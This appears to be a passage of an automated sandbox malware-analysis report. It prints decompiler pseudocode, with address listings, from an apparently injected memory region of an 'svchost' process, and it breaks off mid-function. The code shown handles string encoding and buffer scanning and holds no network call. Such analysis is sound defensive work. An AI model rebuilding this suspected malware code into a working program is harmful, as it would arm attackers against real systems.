                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				char _v74;
                                                                                                                                                                                                                                                                          				short _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                                                                                                                          				intOrPtr _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                          				intOrPtr _v132;
                                                                                                                                                                                                                                                                          				intOrPtr _v136;
                                                                                                                                                                                                                                                                          				intOrPtr _v140;
                                                                                                                                                                                                                                                                          				intOrPtr _v144;
                                                                                                                                                                                                                                                                          				intOrPtr* _v148;
                                                                                                                                                                                                                                                                          				intOrPtr _v152;
                                                                                                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                                                                                                          				intOrPtr _v160;
                                                                                                                                                                                                                                                                          				intOrPtr _v164;
                                                                                                                                                                                                                                                                          				void* _t211;
                                                                                                                                                                                                                                                                          				void* _t213;
                                                                                                                                                                                                                                                                          				void* _t215;
                                                                                                                                                                                                                                                                          				signed int _t220;
                                                                                                                                                                                                                                                                          				intOrPtr _t226;
                                                                                                                                                                                                                                                                          				intOrPtr _t228;
                                                                                                                                                                                                                                                                          				intOrPtr _t251;
                                                                                                                                                                                                                                                                          				void* _t253;
                                                                                                                                                                                                                                                                          				intOrPtr _t258;
                                                                                                                                                                                                                                                                          				void* _t261;
                                                                                                                                                                                                                                                                          				intOrPtr _t266;
                                                                                                                                                                                                                                                                          				void* _t269;
                                                                                                                                                                                                                                                                          				signed int _t275;
                                                                                                                                                                                                                                                                          				void* _t277;
                                                                                                                                                                                                                                                                          				intOrPtr _t370;
                                                                                                                                                                                                                                                                          				void* _t373;
                                                                                                                                                                                                                                                                          				void* _t374;
                                                                                                                                                                                                                                                                          				signed int _t375;
                                                                                                                                                                                                                                                                          				void* _t376;
                                                                                                                                                                                                                                                                          				void* _t377;
                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                          				void* _t379;
                                                                                                                                                                                                                                                                          				void* _t380;
                                                                                                                                                                                                                                                                          				void* _t382;
                                                                                                                                                                                                                                                                          				void* _t384;
                                                                                                                                                                                                                                                                          				void* _t385;
                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t374 = __esi;
                                                                                                                                                                                                                                                                          				_t373 = __edi;
                                                                                                                                                                                                                                                                          				_t277 = __ebx;
                                                                                                                                                                                                                                                                          				_v16 =  *0x429024 ^ _t375;
                                                                                                                                                                                                                                                                          				_v148 = __ecx;
                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                          				_v8 = 0x48;
                                                                                                                                                                                                                                                                          				_v48 =  *0x426ec4;
                                                                                                                                                                                                                                                                          				_v44 =  *0x426ec8;
                                                                                                                                                                                                                                                                          				_v28 =  *0x426ecc;
                                                                                                                                                                                                                                                                          				_v24 =  *0x426ed0;
                                                                                                                                                                                                                                                                          				_v20 =  *0x426ed4;
                                                                                                                                                                                                                                                                          				_v40 =  *0x426ed8;
                                                                                                                                                                                                                                                                          				_v36 =  *0x426edc;
                                                                                                                                                                                                                                                                          				_v32 =  *0x426ee0;
                                                                                                                                                                                                                                                                          				_v30 =  *0x426ee2;
                                                                                                                                                                                                                                                                          				while(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_v52 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                          					if(_v52 < 0) {
                                                                                                                                                                                                                                                                          						_v52 = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)( *_v148 + 0x2c)) > _v52) {
                                                                                                                                                                                                                                                                          						_v60 = 0xffffffff;
                                                                                                                                                                                                                                                                          						_v56 = 0;
                                                                                                                                                                                                                                                                          						_v56 = 0;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							_t334 = _v56;
                                                                                                                                                                                                                                                                          							if(_v56 >=  *((intOrPtr*)( *_v148 + 0x2c))) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t370 =  *((intOrPtr*)( *_v148 + 0x28));
                                                                                                                                                                                                                                                                          							_t275 = _v56;
                                                                                                                                                                                                                                                                          							_t334 =  *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4))));
                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4)))) != _v52) {
                                                                                                                                                                                                                                                                          								_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v60 = _v56;
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v60 >= 0) {
                                                                                                                                                                                                                                                                          							_t211 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v48, 1);
                                                                                                                                                                                                                                                                          							_t377 = _t376 + 0xc;
                                                                                                                                                                                                                                                                          							if(_t211 == 0) {
                                                                                                                                                                                                                                                                          								_t213 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v28, 1);
                                                                                                                                                                                                                                                                          								_t378 = _t377 + 0xc;
                                                                                                                                                                                                                                                                          								if(_t213 == 0) {
                                                                                                                                                                                                                                                                          									_t215 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v40, 1);
                                                                                                                                                                                                                                                                          									_t379 = _t378 + 0xc;
                                                                                                                                                                                                                                                                          									if(_t215 == 0) {
                                                                                                                                                                                                                                                                          										_v96 = 0;
                                                                                                                                                                                                                                                                          										_t220 = E0401EA00(_t373,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x10)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x14)),  &_v96);
                                                                                                                                                                                                                                                                          										_t376 = _t379 + 0xc;
                                                                                                                                                                                                                                                                          										_v92 = _t220;
                                                                                                                                                                                                                                                                          										if(_v96 == 0 || _v92 <= 0) {
                                                                                                                                                                                                                                                                          											L49:
                                                                                                                                                                                                                                                                          											_t334 = 0;
                                                                                                                                                                                                                                                                          											if(0 != 0) {
                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											goto L50;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											asm("cdq");
                                                                                                                                                                                                                                                                          											_v100 = _v92 + _v92 / 0x48 * 2;
                                                                                                                                                                                                                                                                          											_t226 = E04020CE0(_v100);
                                                                                                                                                                                                                                                                          											_t380 = _t376 + 4;
                                                                                                                                                                                                                                                                          											_v132 = _t226;
                                                                                                                                                                                                                                                                          											_v104 = _v132;
                                                                                                                                                                                                                                                                          											_v56 = 0;
                                                                                                                                                                                                                                                                          											_v108 = 0;
                                                                                                                                                                                                                                                                          											while(_v56 < _v92) {
                                                                                                                                                                                                                                                                          												if(_v56 > 0) {
                                                                                                                                                                                                                                                                          													asm("cdq");
                                                                                                                                                                                                                                                                          													if(_v56 % 0x48 == 0) {
                                                                                                                                                                                                                                                                          														 *((char*)(_v104 + _v108)) = 0xd;
                                                                                                                                                                                                                                                                          														 *((char*)(_v104 + _v108 + 1)) = 0xa;
                                                                                                                                                                                                                                                                          														_v108 = _v108 + 2;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												 *((char*)(_v104 + _v108)) =  *((intOrPtr*)(_v96 + _v56));
                                                                                                                                                                                                                                                                          												_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          												_v108 = _v108 + 1;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t228 = E04020CE0(8);
                                                                                                                                                                                                                                                                          											_t376 = _t380 + 4;
                                                                                                                                                                                                                                                                          											_v136 = _t228;
                                                                                                                                                                                                                                                                          											if(_v136 == 0) {
                                                                                                                                                                                                                                                                          												_v164 = 0;
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												_v164 = E0401F4E0(_v136);
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_v12 = _v164;
                                                                                                                                                                                                                                                                          											E0401FC90(_t277, _v12, _t373, _t374, _v104, _v100);
                                                                                                                                                                                                                                                                          											if(_v104 != 0) {
                                                                                                                                                                                                                                                                          												_v140 = _v104;
                                                                                                                                                                                                                                                                          												E04020CC0(_v140);
                                                                                                                                                                                                                                                                          												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                          												_v104 = 0x666;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											if(_v96 != 0) {
                                                                                                                                                                                                                                                                          												_v144 = _v96;
                                                                                                                                                                                                                                                                          												E04020CC0(_v144);
                                                                                                                                                                                                                                                                          												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                          												_v96 = 0x666;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											goto L49;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v88 =  *0x426ee4;
                                                                                                                                                                                                                                                                          									_v84 =  *0x426ee8;
                                                                                                                                                                                                                                                                          									_v80 =  *0x426eec;
                                                                                                                                                                                                                                                                          									_v76 =  *0x426ef0;
                                                                                                                                                                                                                                                                          									_v74 =  *0x426ef2;
                                                                                                                                                                                                                                                                          									_v64 = 0x1a;
                                                                                                                                                                                                                                                                          									_v120 = E04020CE0(_v64);
                                                                                                                                                                                                                                                                          									_v72 = _v120;
                                                                                                                                                                                                                                                                          									E04007010(_t373, _v72, 0, _v64);
                                                                                                                                                                                                                                                                          									_t382 = _t379 + 0x10;
                                                                                                                                                                                                                                                                          									_v68 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                          									if(_v68 < 0) {
                                                                                                                                                                                                                                                                          										_v68 = 0;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									 *0x4251f8(_v72, _v64 - 1,  &_v88, _v68);
                                                                                                                                                                                                                                                                          									_t251 = E04020CE0(8);
                                                                                                                                                                                                                                                                          									_t384 = _t382 + 0x14;
                                                                                                                                                                                                                                                                          									_v124 = _t251;
                                                                                                                                                                                                                                                                          									if(_v124 == 0) {
                                                                                                                                                                                                                                                                          										_v160 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v160 = E0401F4E0(_v124);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v12 = _v160;
                                                                                                                                                                                                                                                                          									_t253 = E040070A0(_v72);
                                                                                                                                                                                                                                                                          									_t376 = _t384 + 4;
                                                                                                                                                                                                                                                                          									E0401FC90(_t277, _v12, _t373, _t374, _v72, _t253);
                                                                                                                                                                                                                                                                          									if(_v72 != 0) {
                                                                                                                                                                                                                                                                          										_v128 = _v72;
                                                                                                                                                                                                                                                                          										E04020CC0(_v128);
                                                                                                                                                                                                                                                                          										_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                          										_v72 = 0x666;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L49;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t258 = E04020CE0(8);
                                                                                                                                                                                                                                                                          								_t385 = _t378 + 4;
                                                                                                                                                                                                                                                                          								_v116 = _t258;
                                                                                                                                                                                                                                                                          								if(_v116 == 0) {
                                                                                                                                                                                                                                                                          									_v156 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v156 = E0401F4E0(_v116);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = _v156;
                                                                                                                                                                                                                                                                          								_t261 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)));
                                                                                                                                                                                                                                                                          								_t376 = _t385 + 4;
                                                                                                                                                                                                                                                                          								E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)), _t261);
                                                                                                                                                                                                                                                                          								goto L49;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t266 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t386 = _t377 + 4;
                                                                                                                                                                                                                                                                          							_v112 = _t266;
                                                                                                                                                                                                                                                                          							if(_v112 == 0) {
                                                                                                                                                                                                                                                                          								_v152 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v152 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v12 = _v152;
                                                                                                                                                                                                                                                                          							_t269 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)));
                                                                                                                                                                                                                                                                          							_t376 = _t386 + 4;
                                                                                                                                                                                                                                                                          							E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)), _t269);
                                                                                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L50;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						L50:
                                                                                                                                                                                                                                                                          						return E04006C8C(_v12, _t277, _v16 ^ _t375, _t334, _t373, _t374);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L50;
                                                                                                                                                                                                                                                                          			}








































































                                                                                                                                                                                                                                                                          0x040137a0
                                                                                                                                                                                                                                                                          0x040137a0
                                                                                                                                                                                                                                                                          0x040137a0
                                                                                                                                                                                                                                                                          0x040137b0
                                                                                                                                                                                                                                                                          0x040137b3
                                                                                                                                                                                                                                                                          0x040137b9
                                                                                                                                                                                                                                                                          0x040137c0
                                                                                                                                                                                                                                                                          0x040137cc
                                                                                                                                                                                                                                                                          0x040137d6
                                                                                                                                                                                                                                                                          0x040137e0
                                                                                                                                                                                                                                                                          0x040137e8
                                                                                                                                                                                                                                                                          0x040137f2
                                                                                                                                                                                                                                                                          0x040137fc
                                                                                                                                                                                                                                                                          0x04013804
                                                                                                                                                                                                                                                                          0x0401380e
                                                                                                                                                                                                                                                                          0x04013818
                                                                                                                                                                                                                                                                          0x0401381b
                                                                                                                                                                                                                                                                          0x0401382f
                                                                                                                                                                                                                                                                          0x04013836
                                                                                                                                                                                                                                                                          0x04013838
                                                                                                                                                                                                                                                                          0x04013838
                                                                                                                                                                                                                                                                          0x0401384d
                                                                                                                                                                                                                                                                          0x04013854
                                                                                                                                                                                                                                                                          0x0401385b
                                                                                                                                                                                                                                                                          0x04013862
                                                                                                                                                                                                                                                                          0x04013874
                                                                                                                                                                                                                                                                          0x0401387c
                                                                                                                                                                                                                                                                          0x04013882
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401388c
                                                                                                                                                                                                                                                                          0x0401388f
                                                                                                                                                                                                                                                                          0x04013895
                                                                                                                                                                                                                                                                          0x0401389a
                                                                                                                                                                                                                                                                          0x04013871
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013871
                                                                                                                                                                                                                                                                          0x0401389f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401389f
                                                                                                                                                                                                                                                                          0x040138aa
                                                                                                                                                                                                                                                                          0x040138be
                                                                                                                                                                                                                                                                          0x040138c3
                                                                                                                                                                                                                                                                          0x040138c8
                                                                                                                                                                                                                                                                          0x0401394d
                                                                                                                                                                                                                                                                          0x04013952
                                                                                                                                                                                                                                                                          0x04013957
                                                                                                                                                                                                                                                                          0x040139dc
                                                                                                                                                                                                                                                                          0x040139e1
                                                                                                                                                                                                                                                                          0x040139e6
                                                                                                                                                                                                                                                                          0x04013aef
                                                                                                                                                                                                                                                                          0x04013b24
                                                                                                                                                                                                                                                                          0x04013b29
                                                                                                                                                                                                                                                                          0x04013b2c
                                                                                                                                                                                                                                                                          0x04013b33
                                                                                                                                                                                                                                                                          0x04013c70
                                                                                                                                                                                                                                                                          0x04013c70
                                                                                                                                                                                                                                                                          0x04013c72
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013b43
                                                                                                                                                                                                                                                                          0x04013b46
                                                                                                                                                                                                                                                                          0x04013b54
                                                                                                                                                                                                                                                                          0x04013b5b
                                                                                                                                                                                                                                                                          0x04013b60
                                                                                                                                                                                                                                                                          0x04013b63
                                                                                                                                                                                                                                                                          0x04013b69
                                                                                                                                                                                                                                                                          0x04013b6c
                                                                                                                                                                                                                                                                          0x04013b73
                                                                                                                                                                                                                                                                          0x04013b7a
                                                                                                                                                                                                                                                                          0x04013b86
                                                                                                                                                                                                                                                                          0x04013b8b
                                                                                                                                                                                                                                                                          0x04013b95
                                                                                                                                                                                                                                                                          0x04013b9d
                                                                                                                                                                                                                                                                          0x04013ba6
                                                                                                                                                                                                                                                                          0x04013bb0
                                                                                                                                                                                                                                                                          0x04013bb0
                                                                                                                                                                                                                                                                          0x04013b95
                                                                                                                                                                                                                                                                          0x04013bc1
                                                                                                                                                                                                                                                                          0x04013bc9
                                                                                                                                                                                                                                                                          0x04013bd2
                                                                                                                                                                                                                                                                          0x04013bd2
                                                                                                                                                                                                                                                                          0x04013bd9
                                                                                                                                                                                                                                                                          0x04013bde
                                                                                                                                                                                                                                                                          0x04013be1
                                                                                                                                                                                                                                                                          0x04013bee
                                                                                                                                                                                                                                                                          0x04013c03
                                                                                                                                                                                                                                                                          0x04013bf0
                                                                                                                                                                                                                                                                          0x04013bfb
                                                                                                                                                                                                                                                                          0x04013bfb
                                                                                                                                                                                                                                                                          0x04013c13
                                                                                                                                                                                                                                                                          0x04013c21
                                                                                                                                                                                                                                                                          0x04013c2a
                                                                                                                                                                                                                                                                          0x04013c2f
                                                                                                                                                                                                                                                                          0x04013c3c
                                                                                                                                                                                                                                                                          0x04013c41
                                                                                                                                                                                                                                                                          0x04013c44
                                                                                                                                                                                                                                                                          0x04013c44
                                                                                                                                                                                                                                                                          0x04013c4f
                                                                                                                                                                                                                                                                          0x04013c54
                                                                                                                                                                                                                                                                          0x04013c61
                                                                                                                                                                                                                                                                          0x04013c66
                                                                                                                                                                                                                                                                          0x04013c69
                                                                                                                                                                                                                                                                          0x04013c69
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013c4f
                                                                                                                                                                                                                                                                          0x04013b33
                                                                                                                                                                                                                                                                          0x040139f1
                                                                                                                                                                                                                                                                          0x040139fa
                                                                                                                                                                                                                                                                          0x04013a03
                                                                                                                                                                                                                                                                          0x04013a0c
                                                                                                                                                                                                                                                                          0x04013a16
                                                                                                                                                                                                                                                                          0x04013a19
                                                                                                                                                                                                                                                                          0x04013a2c
                                                                                                                                                                                                                                                                          0x04013a32
                                                                                                                                                                                                                                                                          0x04013a3f
                                                                                                                                                                                                                                                                          0x04013a44
                                                                                                                                                                                                                                                                          0x04013a50
                                                                                                                                                                                                                                                                          0x04013a57
                                                                                                                                                                                                                                                                          0x04013a59
                                                                                                                                                                                                                                                                          0x04013a59
                                                                                                                                                                                                                                                                          0x04013a73
                                                                                                                                                                                                                                                                          0x04013a7e
                                                                                                                                                                                                                                                                          0x04013a83
                                                                                                                                                                                                                                                                          0x04013a86
                                                                                                                                                                                                                                                                          0x04013a8d
                                                                                                                                                                                                                                                                          0x04013a9f
                                                                                                                                                                                                                                                                          0x04013a8f
                                                                                                                                                                                                                                                                          0x04013a97
                                                                                                                                                                                                                                                                          0x04013a97
                                                                                                                                                                                                                                                                          0x04013aaf
                                                                                                                                                                                                                                                                          0x04013ab6
                                                                                                                                                                                                                                                                          0x04013abb
                                                                                                                                                                                                                                                                          0x04013ac6
                                                                                                                                                                                                                                                                          0x04013acf
                                                                                                                                                                                                                                                                          0x04013ad4
                                                                                                                                                                                                                                                                          0x04013adb
                                                                                                                                                                                                                                                                          0x04013ae0
                                                                                                                                                                                                                                                                          0x04013ae3
                                                                                                                                                                                                                                                                          0x04013ae3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013aea
                                                                                                                                                                                                                                                                          0x0401395b
                                                                                                                                                                                                                                                                          0x04013960
                                                                                                                                                                                                                                                                          0x04013963
                                                                                                                                                                                                                                                                          0x0401396a
                                                                                                                                                                                                                                                                          0x0401397c
                                                                                                                                                                                                                                                                          0x0401396c
                                                                                                                                                                                                                                                                          0x04013974
                                                                                                                                                                                                                                                                          0x04013974
                                                                                                                                                                                                                                                                          0x0401398c
                                                                                                                                                                                                                                                                          0x040139a4
                                                                                                                                                                                                                                                                          0x040139a9
                                                                                                                                                                                                                                                                          0x040139c5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040139c5
                                                                                                                                                                                                                                                                          0x040138cc
                                                                                                                                                                                                                                                                          0x040138d1
                                                                                                                                                                                                                                                                          0x040138d4
                                                                                                                                                                                                                                                                          0x040138db
                                                                                                                                                                                                                                                                          0x040138ed
                                                                                                                                                                                                                                                                          0x040138dd
                                                                                                                                                                                                                                                                          0x040138e5
                                                                                                                                                                                                                                                                          0x040138e5
                                                                                                                                                                                                                                                                          0x040138fd
                                                                                                                                                                                                                                                                          0x04013915
                                                                                                                                                                                                                                                                          0x0401391a
                                                                                                                                                                                                                                                                          0x04013936
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013936
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401384f
                                                                                                                                                                                                                                                                          0x04013c78
                                                                                                                                                                                                                                                                          0x04013c88
                                                                                                                                                                                                                                                                          0x04013c88
                                                                                                                                                                                                                                                                          0x0401384d
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                          • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                          • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                                                          			E04013F50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				signed int _v21;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				signed char _v73;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                                                                                                                          				intOrPtr _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                          				char _v132;
                                                                                                                                                                                                                                                                          				char _v136;
                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                          				void* _t224;
                                                                                                                                                                                                                                                                          				void* _t231;
                                                                                                                                                                                                                                                                          				intOrPtr _t237;
                                                                                                                                                                                                                                                                          				void* _t260;
                                                                                                                                                                                                                                                                          				intOrPtr _t267;
                                                                                                                                                                                                                                                                          				signed int _t283;
                                                                                                                                                                                                                                                                          				intOrPtr _t286;
                                                                                                                                                                                                                                                                          				void* _t292;
                                                                                                                                                                                                                                                                          				void* _t394;
                                                                                                                                                                                                                                                                          				void* _t395;
                                                                                                                                                                                                                                                                          				void* _t396;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t395 = __esi;
                                                                                                                                                                                                                                                                          				_t394 = __edi;
                                                                                                                                                                                                                                                                          				_t292 = __ebx;
                                                                                                                                                                                                                                                                          				_v120 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0 && _a8 >= 0 && _a12 >= 0xffffffff) {
                                                                                                                                                                                                                                                                          					if(_a8 <=  *((intOrPtr*)(_a4 + 4)) - 1) {
                                                                                                                                                                                                                                                                          						if(_a12 <=  *((intOrPtr*)(_a4 + 4)) - _a8) {
                                                                                                                                                                                                                                                                          							if(_a12 < 0) {
                                                                                                                                                                                                                                                                          								_a12 =  *((intOrPtr*)(_a4 + 4)) - _a8;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v12 =  *_a4;
                                                                                                                                                                                                                                                                          							_v16 = _a8 + _a12;
                                                                                                                                                                                                                                                                          							_v20 = _a8;
                                                                                                                                                                                                                                                                          							while(_v20 < _v16) {
                                                                                                                                                                                                                                                                          								_v21 = 0;
                                                                                                                                                                                                                                                                          								_t223 = E040072C4(_v12 + _v20, 0x426c54, 2);
                                                                                                                                                                                                                                                                          								_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                          								if(_t223 != 0) {
                                                                                                                                                                                                                                                                          									_t224 = E040072C4(_v12 + _v20, 0x426c50, 2);
                                                                                                                                                                                                                                                                          									_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                          									if(_t224 != 0) {
                                                                                                                                                                                                                                                                          										L74:
                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										if((_a20 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_v32 = 0;
                                                                                                                                                                                                                                                                          											while(_v32 < 4) {
                                                                                                                                                                                                                                                                          												_t286 = E040070A0( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                          												_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                          												_v36 = _t286;
                                                                                                                                                                                                                                                                          												_push(_v36);
                                                                                                                                                                                                                                                                          												_push( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                          												_t50 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                          												_push(_v12 + _t50);
